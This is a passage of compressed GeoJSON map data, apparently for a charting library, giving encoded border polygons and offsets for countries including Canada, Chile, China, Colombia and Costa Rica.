ĪţѨq¼αуƜƏŵ҅ŮΏŅqƕ܁þΔƟÑɣ֤ɬʹWǄυࢍǙඩ¤҅¢ðƊਿĨ͛ȶٿοޥÉछɑᵽƳЩ̀Ý̚ྣôݩŢֵՊᔔɐ࿢ñࡌìᄿ͎ምĕഅ֩ɒIŬ៺ϬᕏďʑÚОǊ۹UͻĬȆؚɸɣƐ̈ǦᰶتδÙžȏЃБ\"],[\"@@൏ҼʶǺઞÒؘǃɡ֕͡\"],[\"@@ੂVࣤƓࡰտ൹®ఝŝсÎ̥ͰӿĠÓ͘ાÇ\"],[\"@@ߐŢҤAɬĻľԒ՝ÈӓʐӸȸࢎǁҷɜȀÌ׽ʷʨ͚ȚࡌƁ৕ʺࢎ̎ՔªƆຆżҒăैܩߝϩ԰ŜˁҗزʨʢȋžɸĪۦƥOȕ΢ƋɷȄƎɀসơ߽ʖؘɊႤŹո̃ܵёࡨ͐׌ķęŗݛŏшʝϧђΰ֤ļ̯͑ТƸ҂ʯćɊ͂Š੖ƋΌƫɟȝϋU׍ɛݞǺ̺ÑҜŒź³õɓे̣ԪÎŹ̻ϘϠࡾɞ௢ȡŎŇ෍ρ੾Ɗȗȋɞֺ͂אʁŤʭڣਗɏئÆ੶įѪůRť෗ÂՑőՀØӪę§ʁ஻ÖञŻɬƭ৒ÇʑōĠɓǎÂÈāƨΚÐșϓтȦàů̘Ğʗ]ǢвŸĉȳ͐¬ڎɱƃǿׇFܨïȶĨҨţ։΋تńӪɌŠ٪̛ƥŋԃîҬɩ͕ÁԅĈhƯҖǇՏgȰƵɵǋѓdʑǐŧȗ¡˂u͗ȱʩةȴÜȔʇʅ܅ծߦҬҷȩۑåƚǪ΁Óޡж÷ďȗèɓփƂךεƕĕБՍʆʏ¥Ҁķ~ǩːąÏǫ̰àϞǟǿÿ՜ѿÀƼΞɹɴƐ֐ɉɉŃϤÉśő̯SΊɟЮ@ĵĥ͚ǫɇϯѷѦļсͬ˹ЫV®ʳफИIĭƻȫȨǏ৏֐ƞʽ٫ʬΕk٨ѿϸá»ë๎ڧť˅ᎋ̦ӷƚЀՋIӅŮʯüƈĲ͵¯թ̎ԤƐޅŮĮƒ˗ÍߥӚƸƸ՝IŻŹÅƸ˥ȁƼȧÅȌɥࡩx©ōࣵŻݻĺʇŞ¥τؠɐɌ఼ȍ͕̈́ĂƖχʐՎ[ࡺȂӲeܫֶ୐ҼȶʬӌȊࣃऒ҉LA˖ʝ^ņŷɽMԻɢƪȦ༳̅zʼԔlʲƴۉɎȚǌё÷̇ÀȚŞ؛ÐƵͦёSڃ̀˵ǟҖƅwɝԿ÷ᅗĶؘ̌եǲؓėܙƠ׫ೕŲ̇ÙҕĞÙːேǿߍȼ֡ӊഢįפÈᖑϜ³ߘঀ࠮ࠢː๨ńࡈŇࢭ΃տӵςۙ৐ҝೇ˻\"],[\"@@܀ǵదƀрÁƚƃԽƏ̒ī९ϑڈòѐͳҊêŬƃ̗ȕǀЩ߿ǡԉšǄľΉϵśһîଷ٠ԩƐџCࠟϘъ˂޲̙ڎªöǢɤÏ΃ʔײ`ғŪѯëՑǲҠĨϢųχ˼ࠈHUŴ\"],[\"@@ס³ϋêขǶӓȫ\"],[\"@@ߔǁഄiȸŃร࣑ჿHφõǺȹЛͣࠃ_ӿܸھ޼νǾƊƈຬĴ\"],[\"@@ѾîôƵӖȖࡼY၊ԧÂƯᱝىҩ͍֕÷σקܑĭɷ²ଃ̍ދӪએʞңLႢຐݯӤᧈǔ࿈ʿơĵ\"],[\"@@ͧ_ˬĮ¼č\"],[\"@@ҙÞ˺°Ǡō\"],[\"@@٣ĤҔʂנȱЏų\"],[\"@@}̟߱ჃͪըΌࣜƾࠂǩ̮ͧ\"],[\"@@۱ŋÉŌԬŨʐŧ\"],[\"@@̽ƴ̨ÆVȹ\"],[\"@@ЧµӟĄ๘к׏҇\"],[\"@@ӛéՊʬ­ȁ\"],[\"@@ȀÛӑƅء_ɰżߋ^ƺĔωVĝŔ഼ŀтʕ\"],[\"@@ࠆőɓđ࢟Yȑɮіºªé\"],[\"@@ǃץМóÒɅˇôȍùǢʏ̷ÖÙƗᄩsȽƲ˴¸Ӈƈ౤ʖ᭣ƹǭðոɴঠÝχ¢ϩȦ̀ŒӛĪׄĀದсȹǌӒzܻĆξÎ܏ǲࡠĞޤƕưȔࡔȑ\"],[\"@@͗t଀ňߧŻ\"],[\"@@ӎ½ʡǅڰðʬǱȤ̂࢜ßĨˁӕҗࢽƋ૑h̙Ĳᶿկॷաɚఐɔ঒ӠȦᔱƿšǆ͖ƂңdŷǍ̃ÀǁӋģͥŜ˅ūعǠࣵ¾ʶȐল޺Ƽઃýاº̤ńຼľඡ¾ϤȦலmࢗĈۖȒڰ̶ȵूI൪չᄘMDƂާȘ͒Ǻ۟ȌৼϊՌ×Ʀֱ\"],[\"@@ۣȒΜĒφą}ȝ\"],[\"@@ੱ¨ߌĎ˦ŵ\"],[\"@@ࣆţʯ˓ҐƢෆ¼ٚƻܻᅌŻĹĥ၁ᅊΥ̱ȗؖģɬǤόūІÂǆùʂŐલȇkŒ႔ʒאË࣪æ໨ǝۀ̳ܻȍ࠘įҗë͹Îîˋඩģڝ´ډ̺SˇݥÝՕĊÓ÷ʷḙ̂ďᔫIģ˴ࡱɵ࠳¶˝ǤɇƗΑL۷ԜǢӪݿѐᆵ÷ٟȈ͜ĈਕżД¸̙ƦކĀಮŹ\"],[\"@@ٹȍѨǕωʲǅࢫƯȟȿّľĦͲމʕʏ͛пǞ°ˡ͗śзσ̜̫Ǘ્¹ǰʻw͒ȀߪĎᐄܐሺǑłѺè߮ƹ\"],[\"@@ͧ±ٟİs˄রŷLȉ\"],[\"@@ցۏҶϖG࢜ͯ_Ǐ\"],[\"@@ᆸ«ȯɯᏋdǩǼ׮ü\"],[\"@@ַÏŸ੊§ǆāׇ\"],[\"@@ϣ׉ǎղƌм˕\"],[\"@@۰y਱ȫ״ÑȧᆣƉڕƔ§̾ᙎǘ\"],[\"@@˦˭ඹÐ̇ģԩúࣻḚ́ƚနɤࢾë\"],[\"@@ઐšΏƑͪűႱɧ֗ʆ״¾कƤʃϖߚRবɁ\"],[\"@@܎νܺǘӚɷ׌fۚȣό؏झqڣ̤ಃ°Ľĺ৹ġۇüūǚ૶YϙĄղĐہǪرƳŰȀڏLlǮńæ࿰O\"],[\"@@ŹɍथƤHǐݴ̤ť\"],[\"@@ਰґஂé͈˿ւ¯˙ʴ܌ȹɱߐǡˋˁߪ°ˤſ̠ŐԘ˝ྑʹևʣΡˎ¶ϫّ¢åͯ৷Ξјϓ٫ƘˉƫรƎйŮࠚèୱÆ̱ŤЌtߣźೊ̔਺ø౫ÞणƅƩĤ࠱ĥҹȦ੖Ǭ૳Ù܋ɌƷȂᅄó͒Ŭॣ¹ࠩư܂ª̔ͅှƉೱɼ҆ǰ෎¨޷Ș়`ॲǳ\"],[\"@@ᣈ÷႟ɯᦜŪˆĒЖĻܨ̧ͨ٬Ð࣪ßȉɏᛏχᇃŁჁ˕ᾆǘ♩टঋƀϔʱຓġద}ۍ˥ࢣÉ࿧ưޠıĢɃᅡ÷୩ĈઞɭऺSƇǍ῅טŏൂÄ๨ɋ͡ǥ಍ਈƷ֟ˉᅫÃÃΩՍƩ༩w࣯ǰ̜Ƴً¡ʨýቒOѦʫ׆îʲȇʩƹᑝͭƥʠرrڿȔʠɍ൷[˵Ȉ§ˋܭ«િɾȏǩ֣ÒŕŚOǗݯhċ̰¥̏ۗ¬ŉ̒ऐɸ೰æܳɂ˯̊੘âখͷ܌čࡤ®ࡖκĬŤহϫ౓vɏ̲޴ɦͤgֿÂņʎڭΗՍyʢɘ࠱ǻ՛¦شԈະŜผţ౪ǦׁÓဇþzĺڶÅᜁږßΎᙲ{ႊҗ৲ã̐ÂݕpဏՊㄾҖ༓ò໦ДℹٳགྷÝ֌ǎᇏȵ໩̑Ĉ߶ɖጎȊᐯħಣ̫֣L঍ɠᗄĂಊɂያǥጉ¡˗ŞتàϷàნǔݍ྿ƅԂȖఃÃ̗ĨᳮΌ࢜ř͢þ೨Ë೑Ȣ฀Țቜ̹ĆƜᣒͫ᠛Қ٢ľλĠੈ³ŭǨቘċ୿Ȝᒌ_ഞ̣όØಷͲᗮJ์ʕڃƸՊƪۢh࢘ǗŧƲपКĉ\"]],\"encodeOffsets\":[[[-61222,44995]],[[-68364,45755]],[[-62424,46582]],[[-75463,46680]],[[-75332,46561]],[[-62571,47048]],[[-65342,47584]],[[-63400,48420]],[[-55528,48580]],[[-76501,46084]],[[-129118,50539]],[[-55863,50779]],[[-55391,50939]],[[-129680,50797]],[[-63284,50273]],[[-128188,51300]],[[-130250,51856]],[[-56789,52774]],[[-130994,52710]],[[-81289,53199]],[[-131449,53659]],[[-82669,54014]],[[-134915,54473]],[[-131637,54211]],[[-132267,54393]],[[-132964,54444]],[[-133361,55254]],[[-135839,55427]],[[-134069,55787]],[[-133709,56085]],[[-81897,57557]],[[-80830,57617]],[[-63225,58936]],[[-81629,58896]],[[-70819,60458]],[[-65952,61816]],[[-69871,61687]],[[-80416,62187]],[[-66388,62839]],[[-66591,63365]],[[-81454,63910]],[[-66379,64061]],[[-72025,64050]],[[-83968,64466]],[[-79745,64994]],[[-78517,64916]],[[-86957,66828]],[[-86706,67149]],[[-85735,67376]],[[-110686,68614]],[[-64185,68666]],[[-110489,69020]],[[-75388,69411]],[[-88673,69362]],[[-77492,69963]],[[-80878,69830]],[[-107049,70048]],[[-76678,69990]],[[-104290,70233]],[[-102622,70459]],[[-102394,70670]],[[-81111,70498]],[[-92364,71086]],[[-78843,70804]],[[-103599,71063]],[[-97805,71244]],[[-69544,71210]],[[-79901,71389]],[[-81337,71463]],[[-99778,71315]],[[-88998,71796]],[[-76501,46084]],[[-99105,74688]],[[-117270,74336]],[[-107815,74670]],[[-81446,75423]],[[-88667,72716]],[[-102401,75721]],[[-100628,75642]],[[-95406,75941]],[[-122609,75892]],[[-99692,76315]],[[-97594,76294]],[[-106618,76838]],[[-95787,76829]],[[-98384,77323]],[[-96795,77568]],[[-121168,77394]],[[-80960,77749]],[[-104680,77840]],[[-106519,78422]],[[-100045,78302]],[[-103655,78418]],[[-110891,77883]],[[-91879,78344]],[[-116286,78586]],[[-96558,78759]],[[-118324,79220]],[[-91989,79123]],[[-107067,78994]],[[-97776,79660]],[[-104134,79562]],[[-116564,79621]],[[-113109,79978]],[[-112451,80539]],[[-98513,80417]],[[-105908,81220]],[[-101162,81901]],[[-94090,83081]],[[-71156,85010]]]},\"properties\":{\"name\":\"Canada\",\"childNum\":110}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÅÑ@ĝ«ÏƜBAҬǥǺŒÆiÅCŉOÏĩȟÐ·K¥]u­mÁNwzµfĿ¡STďľ¯Ląků§¹B§TďƨyAā^čɵíǡťǕȍǦÎ®̡ƚóǘÓÇ¿ųíõȫ֑ēǕÕplÉü³ĿĪ[ɀƯlűMěñ½ŝħãIRAÂÆp¼ʌɾǂhÞxĮƘ²nlŐĘŌĔvnj@bč°ÌºƘǨ³ɮƆ۴HĘxX^G\\\\]NčMVStŘߜɃĐ³ćǑ@A\"],\"encodeOffsets\":[[9757,48405]]},\"properties\":{\"name\":\"Switzerland\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɫªƎŞĞǇ\"],[\"@@ɓśŽĬәșȬࢲFƔƧ\"],[\"@@ڪĉό¸ŽǑˤċȠ͙ۋǊoǬʫÎƓŅƬƥȗӋʠĄɞƴ\"],[\"@@ƾċ͚¸ĶǣƫÁ߱ʎϐl\"],[\"@@̲áķɗˣŤЍÏɗɈǶƌԚŭ\"],[\"@@ąʹSɶǿǟǑϱĻĚɘɳƑŉXēɎѿƸͰŖѰÓ\"],[\"@@ؚŭѦʅγ ʥǮ͹`ω˪˞ƣ\"],[\"@@mᇛ۩IȥŬٱą૫ƶąĈņĂ؄SʂĮĆƃ͞ҩΘIȐ˰ɎŸ̟ȿeĀŋ̮ȱάÖШɁǬŴߋʢƍȄºƔآʲɿè׉ħʖˀŤȿǆϐËѬˮȸƳ͆úƆÛ\"],[\"@@ʊ˭ƃˁƁPɅМʂƄ\"],[\"@@½ĳΩCȯȑŖ̆ΖÒƬÍ\"],[\"@@ğë_ʄʾ{ƽƛ\"],[\"@@ͥĺ˦Ϛćƭƽ\"],[\"@@ʃ˕ɁźĨăȊАn\"],[\"@@ıܝƙIįʈƀʪȣĝėˍН¼ȲʢƉŔ͌öĽĺɖǀ®Ȓ̌Ð͋\"],[\"@@şƪâЬƲÜȜԑ̏ş\"],[\"@@̙ʏР\\\\ƖʬŖˢم\"],[\"@@űÖˮƻĩ\"],[\"@@ŷÅȋĂ͈ЬCѧ\"],[\"@@ƽƜĂĜüɷ\"],[\"@@ȯãƙð¡ŐȦʴβƣǫɫ\"],[\"@@ɣǑɲԕʍűԏהĮƦͼìĒȾʔőķ\"],[\"@@ŧāƿ¦˨\"],[\"@@˻Wɭł̎ாђčĖʟ¡ɯˋĳ̔̏ˁȅoƿ\"],[\"@@ƻ_ĦðÖÏ\"],[\"@@ŻĒĢÑ\"],[\"@@ƾƯ̇ࢁݧ̝ʽ̗Ƭ́ǩ˟Ƭ؝Ʃˇɮхɯƕɇ[˟٩ЛЩƝ׃ǗȃÊىĬąĥƵǑEſ֋ǯŁÅΝ˦͙ğŁ˼ڧ¿ˉɞç߅ǙÛ˹܅ƋċŞɵVҏճϱŗˍrޙʸ۽җˣř֕Ʊ¼͕ƃŽĠǣȉʻjߩƊ̛ͫǣاͪȹŻġȌӧŝϡԜµ¬ĳďǟګQnōϐÙȺ̑ͭȹĬ̿ȳǧƨЭȫƯ̵χʓƟ͑ǄȝuɋȑğḘ̈͏ơďʉ˛[ýų¬։̊ԧդŌƜ×ÉܝЪϗ࿪eౢ̉ڟŶ͉ɑথʯǙࡓʩĕ݃ɂȧʂЄĮ¦ʑĎ¨ɄϞǘ¾ȈƉ ݝ̱ɫ˟хǼ˘Кɲ©˰ƐԚ׷ìǱĕɱø·ҍѭȤͼŊİȂĵŕ˻¿έ Ɂ҆βŇŴƀΤãϸǪȌȿęƹżňďʸŔƶɫǈ΁Ĵӌ̃ޗȭȟȶύĬɢÀS̐ܿǠɻ͎΄h÷ǈŎĠɺŃȐˣ˪ĵŶϐ˕˫ǩ˺Ȣq֭ˈʞȂ̀i̫ǰưϢKɏƲƆ΄ʉЕũČtڲ˨ĶϷVġϸৌūǿŸę˴ȋɯʉΫɢĸŔʔģĞö̉ƈ˘ȼŽͦşlµıгŨnȔҳƽĢȡɵȔڂҞţʈކĜɪƒüŐǏԟ̻ƉΨÂöʴŦvɑȫϱĔɆ֖śΚϸŒ˨ęѕǸèɔԾȴ¸ŞbƄԏɤɪžÔȘáʶˊʆ÷̶ØƐŢGşɄŢ¶Ȁǁñ΂˗ÔϴɔŴȋǉ·ƨʏɟ͏NġĤƊƿÄŽͰʜॾɖƤƺӆʙ׸²ЀǓ˼A̜¼Ÿ͖nĊДѾޮƤͲЪȆ޲˴њßҶʒμɋႀʢɨǀìвǟ؊ǲɈȄܞƈȎɼ੒ÇҞɤԤŅѺƴ࣠Ǜʼ~ǖȚǪɄరįՎࡨɕଢаŜľǺ¥ʌƖ®ĊÞÚÈǖν~mǂí§ÿ¬śÆ̽¢ſVŽĢĿȦǟÖ²lwPoħŃĻƉFgİĭhCÃǕů\\\\˽ɘƛ×ɯ̤ͯVˋʰܿDˡʦÍǾƖ\"]],\"encodeOffsets\":[[[-68903,-57115]],[[-68689,-56477]],[[-71375,-56237]],[[-72695,-56184]],[[-73103,-55329]],[[-74673,-54765]],[[-76170,-54192]],[[-70277,-53916]],[[-76618,-52869]],[[-76348,-52507]],[[-77109,-51896]],[[-76856,-51503]],[[-76909,-50008]],[[-76263,-50327]],[[-77322,-49933]],[[-76356,-49758]],[[-76914,-48985]],[[-76096,-46788]],[[-75399,-45897]],[[-74737,-45854]],[[-75504,-45460]],[[-75582,-44879]],[[-75543,-44386]],[[-80695,-34453]],[[-111902,-27791]],[[-68807,-23369]]]},\"properties\":{\"name\":\"Chile\",\"childNum\":26}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŀ˯̻̩ǃҙ͓ʥҡȕۉˊ٦ԤϨċNðĪބƠΖßÂƌȦū\"],[\"@@ŘScĭȉĖü\"],[\"@@ĳaļòGÏ\"],[\"@@QƜægÓų\"],[\"@@ý§\\\\Ěâ±\"],[\"@@ĵolǦĮ¡cœ\"],[\"@@ĵoØŢı\"],[\"@@ɭ¦¯ŊˆÙXĕ\"],[\"@@˽´ʷɌնʿ\"],[\"@@ɽǬKŮ˽ĚǙҧ͑̿݅͟§ȴ͉şȁ߿ŦȍȦǱهۏऋϏѷϣɋƍϣڻɽܝҡʯ¥wśУŏ³ǂӖǂ«ĤǈƔҗAQƆɀĂ@ǦʆĘЊӺυζėŅү°׏֛ࣳГΏӏ֯īɍƈƥȽ˳·ȑǬˁȼŇަşŲ˻ŗ̳ˮǋЈbҪϾ¯´аżݠ̻ΖÌԢŁȃ˭Öķƭĩ΃ń݇̇ȱjîǁƹ}ÕʃȵÛÅƤŧsõëǆőܗַɛϝčࣈЋԔ੏c̕ШȣÀǿϞ͝VħƻRˡŬ͇VϟȤПƛְ¢ÔƏܼпǾͷϭŅԅι̹ɉūʦ¾ŜƛՀƞΜ˙ͼĝӛ͕κĸoЃǙĸȗÁǊȫśiĺåƿǭŔ̉˳ÏŁĖƿʑǯuîĳȵʻjƗˡ˅ǉΧǡ»·ȢħįĹ²ʘϙΗɻ˗ÈǊơʌ°á΋êǙω¸ĘǽʷmËɽɫÿhǵӍLåũƏOǶȓΫ΅ƋHĉɃÝłǩŕƟÌ¥ǍșĉÎÛƇĉËȝǿͱƯǱªšőʫĈ˻ǙǝŜćȏʍXɁyͩ̌BɠčsǃǅȈˉG̳ͳų»ŐœʥũȅƗȏǜ¯ȣ̣Ğ˹ʓӯ¡ϙʟſľɍͥǲě«ƓǖŹƕȉϱÎðìʱЀfǸɀ̌ȳķƔkŹͩĥƒˣƭɪħHnɫƫ¼ßŕɱ¥ǳŬ΃͉ˆʵ°ħѮȖɸȧŊə§ŋĦʯ¡Ӊ΢Ήǫƫ˃˅ıȓĆǛɓˑȮŅǋƓƴ́˓ѕʬÃƛȭ»©£ʇRçĒkJQqs³uß©©mǲΩN£HƟqʓÞđaO±¡oMƋìɕ¥\\\\ovY®RÄÆlĪµ¹ǀЋʃϧRǧɸoɨ؋Ĉ˄۬õĠүĺθŽɾƄǼԻUխǙŦˌƩɚªʄżĂè͎ǆŐɺǆ`˔ɸûǬĸĮ®ԆóڌǕìŻęȣՖϳ˦½MęſÙċgŉėʛȅë»٫˼ϧÜԽ̳࢓ƇϫɝʱҍӁ¢׍rKºÄMlVzÊ¬ÜØ¯îRćgğHůĪǠTƎɻĎ÷°Oůą³GʱĐíNŹOĽTg\\\\|ĺ]xŃįrĻRéaåÉËą{ĭ©±ӷس· ÉÊaüæȶhĐŜȏðŵçŵői_B¿Ƚ`ȧÑ˧Nűbķøïûûn¤yrÛP»cĹĝãġÀåþ·]ůÍqd¾åŪåîå¶ɣCǕb÷p´ĤôAjVµNǵ³·NӉ̐­ŀ¡ĶuÂáïv̑ăΫή޹Ϝƫɚǁǳrȋ¥Ƌȳß­Ǉǔĥ®ֵɺbĬʃǤɓÜɵĊɿ˶̧áXȐ½ǆȲȗȚîƔy®̈b·ƒšɄŞqш¨Ķm®ƏĶëîå͆³ǢȲǸľÑҍǺƗ˺éǂ̂ȱ`̑gŷǡǯ¾ĥ¢bą¨ËWĪ£QĭœuÕA}fÝżƃÈ¾˪mÜeÂýņËĕ ÿdħZ¡Ū}~ʕÖėe¹_ǓêûB·]]R{vķäGjƾâĢ~¶pXIzÖq¨NȒźȋǺçܠ҅ǘɃĵȋÊėȺĠĪǕɖ|ƘIªǈìøPzĜ¤Gjzz¦°Ď¬Ä۶ʈ{Č°~VŜĚHŊvɾŮCĺˍǎE͘ņ¼áÞìºĈņîdäj¢ĬƐìâ`ԂŚĄŢIƖtȈǦbøäʦŤҨȈЈĮØĆÎhʴdfVXbŊMҜ˰ŜůƜͪĲα޼ń԰ԡƚǀļ൐˾Ɇǁ˒¸Ɍÿøʤʟƞ׸೺ࠤǹմDĴšטȞƠǆŋ֊ȊЂڦŦɒѪўĀQČȸªE¸ƋŇĳô÷ǒ±yãŷˤéĔËĔg¦ÇRćĚ¥ƀËâYŊñδvèqǼƫ®Eâj¢ÎQÚōôĺsdkĂųÒȁŬƹÔąìeÐ}ÑÚœ×Бÿ¤ÓJÍ˷ѕǺˡƢl҆ş۶ÉžDǬrؔù৒ӿ՚Õqȧǚïˬ֫ѴұېÎቚȅѠĠĒMζ­ӖÅͺYê]æo˂ʅƸ·ΘÅмï՜ɉʊʶ¤ǌ@ǿ̦]ĸ£ÌjÆ¢æØİҮȈݸʜ୶ƆѠոlĔdߨˌԜӊܸ˶®ŔѽҬиגŔdäeʤIôĈÿĠ˾ÕɄeǨ{âaÆdȌŐŸ ¨z˶ȚŠǀƮ|ƲȲXѦÌѢʀ´W¦_̌͸ʞĊЌup|AĎ\\\\`ĞDǎÏˤŰðXŸĄ[ƨWÌTØSĸÌĨsǢąƜqŤZŬmðDlĶ~ƼƽʖՉшÁřĵÍÄĻĸÍؗHΕ˯Å^ǹŞı~§bşbĝIśsœJ½`ïCſËåßăqɿǀûɌĪ²ŬÀVĈIĠ|ĺܦਸ৆ʻӠ˦ڸȈðǲƵńݺ৐ֶжÿЄӳÈvżݢкᔺɘৢ΋ɚÎӘƉ׊ֱӪ੗͐ͣ~̛Ɇş΁Ϙȝע̤ȍθ^הй̜AɑɄɕÑ˓Ȕʹ౞LȚȜξƄ˘Qۚɶ̺ĵċȗƾʵӭ΍ʱࢯΧգȿġÓ̩ƫč࣫ʠͽ˽Ϸŝɰ٭D׋ǁЏէƥĒǇ\"],[\"@@ƅǦüĻ\"],[\"@@ɂzDȵ˥ÎàŮ\"],[],[\"@@těřlĦð\"],[\"@@Ɨ׏ԛژƇδºцބ୊ҬȰ˰ʧѿຩ͝ҩ\"]],\"encodeOffsets\":[[[113551,20472]],[[113035,21600]],[[115348,22160]],[[115498,22121]],[[121020,25085]],[[122697,26068]],[[124162,28761]],[[125232,30683]],[[124788,32249]],[[133660,43557]],[[116734,22744]],[[116752,23053]],[],[[121250,25111]],[[123913,23164]]]},\"properties\":{\"name\":\"China\",\"childNum\":15}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ҒӁĆĊTĸÙÖCŶŖ͠ŖǬNʖÈZÀÄą®°òŷt¸×¨C¤lpT£gåʱ´iË¤ſĀӻÕoOwfY¯qķ÷ƛБɣףȔࢍǤģƗ»ɻ̑¦ŶŭȉٯưЧ×ӒKܥû͏Ôí¹ʲi܏ĳ്և{ȆÙƼՒ¯ʔƳÈÿXÑĴmÖîÿ¨ʱʧƠɜΰëЮkǆàWĶvøƞUĚĮǰúýXÛZżN¢ʄnŊUîû@oɤșŦZǌľÂkánȐȭäcВƐǄˢɞɶñ̲ǓÈǘɐNpmĶLÆT´nnƞăȜƂºˋC}£ùFcĺ¹èMńĦX¢ªŴŚNƤŁĶL\"],\"encodeOffsets\":[[-5388,10568]]},\"properties\":{\"name\":\"Côte d'Ivoire\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ɯˉϽީʵȭƼƣ­ӭƘ֫˪ˉÄϩ޺ޗĶ՛ĽӿˉȨ۵Ĉ˗ƾઇÕĂඉǯEgōț@ʱ@ڻ@ġ|KIlsNlȢńҐɵϬĀðĽWïƾƸ°ċĦ¤úǣT·ťΥƚçϴɏİIŽĭ²ƨЌʂܸатʒ˼p®hƐĲĖÚrdjkô]ĶBǊƼ̊ʉàáÖȫ gìZƒêŲƎzǊàÀǢƒāžÖǨȴǼ׌ƞˀƮ|ÎŊŴrÌÎΖ®ļɨŚÒЈŨŔĸθƐɦǊɢöÒÜðHºh̜ȌºքčŮȷ¸óøķՎƲAǼ±͖ѧȠց©ؙĒϷŦʕ͈̋உwɡʍ̘Чڄիθ٧Íɛ\"],\"encodeOffsets\":[[15852,7705]]},\"properties\":{\"name\":\"Cameroon\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@͔ϵͼʛȢuʦƴмħȴȂǪsѤԕ˂ūàǯƞ@æőÌçŷ̯üǍį͡ϔƻÜȍહ਍Qˏǻͳşణ͉˧ÅЋɉǣdȡĶíǮ˩YٽǈԭBß˵CÁfëǚѡªŵZÓU«ėǃU¹vŭš¦ãĴȇöÙƎģŨĥĚĹĎƓĀɍ̂؝༓ʕyʥϿσǠϡܷɗࡡČȵӦҋΠÍnǆʌÔiઁȃǄ̑űƿ|ʅόƭöśˌ۵ʔΑծ˭͕ڡÚ֩ɢ»ΊމǣWʌͱɒÅģÉ̳͙ĳɗPɇrÙ}ýÕßJ«ÔmʖĔŜğմ͓Ӓþٴċବ¯pҽjɻFʫH¥m¾B¾ÀƾQ^ĝJʕǉ{ĹU̇ƁŕGǉĝƵC©{ɓǓǕ@͍ÆүƟ̫dÁQԁۼÅ˖ęƊÏżϢƇǖėÈĭዱRՍMƋPؙŧȩȰɬծ¨ÒnfȞȮĲĠ``^¤CɺȝȶĮ¶ɢȊ}ΖƼüųëŕȷʠ¥ંबȒآCܒ˚˴˶Ԫܼ֪ˎᓀΚފĴҮ_ܲЌҜδȤʲΜɓ˨̯༪˝ϊӶҬ»ݸˤضuϮ̂ઠȿɀŚ˦ù\"],\"encodeOffsets\":[[28061,5232]]},\"properties\":{\"name\":\"Dem. Rep. Congo\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĳҭΙމˍᒿܻ֩˵ԩ˙˳Dܑȑءઁफʟ¦ȸìŖûŴΕƻȉ~µɡȵĭɹȞ£D]q`ÝÊ÷Ĝ`̅ƃНΕȫςխղĖȎɨƞƴƋǌb°̆ǿŢǎȇŬÊдϬÏ͐ê]ʹƄĒǠėǖ͋ЊçɦɎź˝ĚsǦŘŘȆ˞øૈԩ̶øҶ̾ɪĚɸȽЀˣ¢ՓƛҒĸ̼ઈ˘ƽ۶ćˊȧľԀʈҾŤ֤݌ƴ֚ƿ˂ļŖŧ\"],\"encodeOffsets\":[[19057,3562]]},\"properties\":{\"name\":\"Congo\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@՛ǏʑЁχ̣Ư˿ŗם̟ԃʶÆɘųŌЙɴ˹çٙɞŹǜ˳݆͢ĔԜŗמۣߤԨŐ̈́ğPȿ̍և}ٙǌե̎ϕҡԹȬ@΄͹ˬকǥѦɿΎ̱҇ɏȨ¿šäĿඟWGձҒQƆ͡ˍÒӧŵa׽ξ̵ȠֻɧఇɹಃeǛƼÕƘµ~ͩ՜़Ëfã¥°ɿŒÓZµÂǫľ­X·gñgéÉǙkƋĢǋÒ¥[Å½Ã»©ȟ×؇N£°Ƒ¾ϔʥŚƗώǕªÃÒ¹xÉÎŃÅx§Þéɪ¡À£¢½¼ÙÁs®i˱Ųū³Яǒг̌ȉǟݵƄÑȰȡǜГŌ֭ЦƓƘȞȎǺÙ]ӪƦń̌tɆǨئ৔ƽi]ƒãħ§ʬĥƘƼÈ˘ñԐƉǴʈȲȁͮĎͰҁպŜЂȊŏ˾΀ʁѶĔƈѮӋÓįŚ^͊ůɚզΒɀ͚̈́îɼŢЎƛ¿ɚϾԐоќħƻőĬćɐҲۤsࢎԀŞʦΞȚϞíŀʏƵƹ\"],\"encodeOffsets\":[[-73031,12147]]},\"properties\":{\"name\":\"Colombia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ð½ǏtĆƂ»\"],[\"@@|ɳʇƼɌø\"],[\"@@ȧŲÔ̈́ĀÔЯ\"]],\"encodeOffsets\":[[[44840,-12602]],[[45544,-12371]],[[44509,-12186]]]},\"properties\":{\"name\":\"Comoros\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŏk±ŪƖlƍ\"],[\"@@yƾú±¿ŋ\"],[\"@@»ûǛ̰ʰˏ\"],[\"@@ȌÉcŁȽDǈ\"],[\"@@°§ǭxãęÙłʼH\"],[\"@@ý¢ŠƵ\"],[\"@@ǥ^Ƃø¤ĕ\"],[\"@@śU{žʬî°åǃů\"]],\"encodeOffsets\":[[[-24891,15213]],[[-23738,15501]],[[-24006,15369]],[[-23467,16627]],[[-24665,17022]],[[-23437,17059]],[[-25484,17222]],[[-25773,17354]]]},\"properties\":{\"name\":\"Cape Verde\",\"childNum\":8}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ʜԑӌթǸýIecgµƁði_¹{}W]i@͛¸GĊÅZǃƧ¾ėVũaƓĭŰɡȳʂȢʵĲƮʧɃǅƚĶǄĻ̄܁Θő˦ѩ˾Aœ̎ʉǅǿȧǬʹüȍ͞ƶϞȫźƎƐƈń֦ȳɴĎ׸ʻǦ¨ÒŎ\"],\"encodeOffsets\":[[-85649,11180]]},\"properties\":{\"name\":\"Costa Rica\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ͭŋȋŸǰAğǘúŶɸ«Ÿˋ\"],[\"@@ȽŘʈ